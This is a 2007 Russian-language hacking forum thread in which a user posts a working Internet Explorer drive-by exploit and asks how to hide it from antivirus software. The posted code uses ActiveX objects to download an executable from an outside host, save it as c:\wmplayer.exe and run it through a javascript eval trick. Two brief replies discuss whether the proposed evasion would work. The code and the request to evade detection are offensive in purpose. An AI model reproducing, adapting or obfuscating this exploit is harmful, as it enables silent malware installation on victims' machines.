Сплойтец под Ie

Discussion in 'Безопасность и Анонимность' started by baz1k, 7 Feb 2007.

  1. baz1k

    baz1k Elder - Старейшина

    Joined:
    22 Aug 2006
    Messages:
    38
    Likes Received:
    21
    Reputations:
    2
    Привет, ребят! Есть такой старенький сплойт под IE, вот его код:
    PHP:
    <textarea id="code" style="display:none;">
    var 
    = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET""http://bazik.km.ru/1.exe",0);
    x.Send();
    var 
    = new ActiveXObject("ADODB.Stream");
    s.Mode 3;
    s.Type 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("c:\\wmplayer.exe",2);
    location.href "mms://";
    </
    textarea>
    <
    script language="javascript">
    function 
    Zqqw(code){
    result='';
    lines=code.split(/\r\n/);
    for(
    i=0;i<lines.length;i++){
    line=lines[i];
    line=line.replace(/^\s+/,"");
    line=line.replace(/\s+$/,"");
    line=line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"
    \\\\");
    line = line.replace(/[/]/g,"
    %2f");
    if (line != '') {
    result += line +'\\r\\n';
    }
    }
    return result;
    }
    function doit() {
    mycode = Zqqw(document.all.code.value);
    myURL = "
    file:javascript:eval('" + mycode + "')";
    window.open(myURL,"
    _media")
    }
    window.open("
    c:\\wmplayer.exe","_media");
    setTimeout("
    doit()", 5000);
    </script>
    Конечно же он палится любым антивирусом! Есть способы шифрования и чего то еще, главное что б работало и не палилось..?
    Если идей нет подскажите что-то похожее по принципу действия, ну кроме WMF..?
     
  2. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    для начала попробуй
    /thread27118.html
     
  3. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    не проканает, таким методом, только на серверной стороне не будет палится...